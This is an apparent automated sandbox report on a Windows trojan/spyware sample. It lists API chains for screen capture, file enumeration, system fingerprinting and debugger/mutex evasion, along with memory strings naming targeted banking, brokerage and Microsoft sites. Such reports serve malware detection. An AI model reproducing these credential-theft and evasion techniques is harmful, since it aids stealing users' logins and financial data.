Code function: 0_2_038F4BA2 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,DeleteObject,DeleteDC,ReleaseDC,

0_2_038F4BA2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007D1490	0_2_007D1490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007DD515	0_2_007DD515
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007E4775	0_2_007E4775
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007DBE09	0_2_007DBE09

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: String function: 007D0310 appears 51 times

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@1/0@1/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Mutant created: \Sessions\1\BaseNamedObjects\1e7f31ac-1494-47cc-9633-054c20e7432e

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2224223067.000000000E144000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127982661.000000000ADA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B55D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF58000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ..pdbd source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2217953373.000000000DD83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2232450057.000000000E65E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2249922214.000000000EF30000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2196463844.000000000D505000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2265708286.000000000F7B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2184249789.000000000CC2A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2133914078.000000000B291000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2124729580.000000000AB3E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2151669338.000000000BAFA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2162785923.000000000C3B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdbx6 source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Desktop\projects\Release\BigProject.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188930924.000000000CFA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Desktop\projects\Release\BigProject.pdb. source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

0_2_00775B80

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_007D004B push ecx; ret

0_2_007D005E

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-145931

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007E24BD FindFirstFileExW,	0_2_007E24BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F1000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,	0_2_038F1000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F4E27 FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,	0_2_038F4E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F1D3C FindFirstFileW,FindNextFileW,	0_2_038F1D3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F40BA FindFirstFileW,FindNextFileW,	0_2_038F40BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F3EFC FindFirstFileW,FindNextFileW,	0_2_038F3EFC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_038F2054 GetCurrentHwProfileA,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_038F2054

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\	Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2115590508.000000000A431000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.co..microsoft.visualstudio.comVMware20,11696492231x
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.000000000124E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_007D4383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_007D4383

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

0_2_00775B80

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_007E5891 GetProcessHeap,

0_2_007E5891

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007D4383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007D4383
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007D0495 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007D0495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007D0622 SetUnhandledExceptionFilter,	0_2_007D0622
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007D06F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_007D06F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_007D013C cpuid

0_2_007D013C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: EnumSystemLocalesW,	0_2_007E5051
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_007E50DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetLocaleInfoW,	0_2_007DE096
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetLocaleInfoW,	0_2_007E532F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_007E5458
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetLocaleInfoW,	0_2_007E555E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_007E5634
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: EnumSystemLocalesW,	0_2_007DDBC7
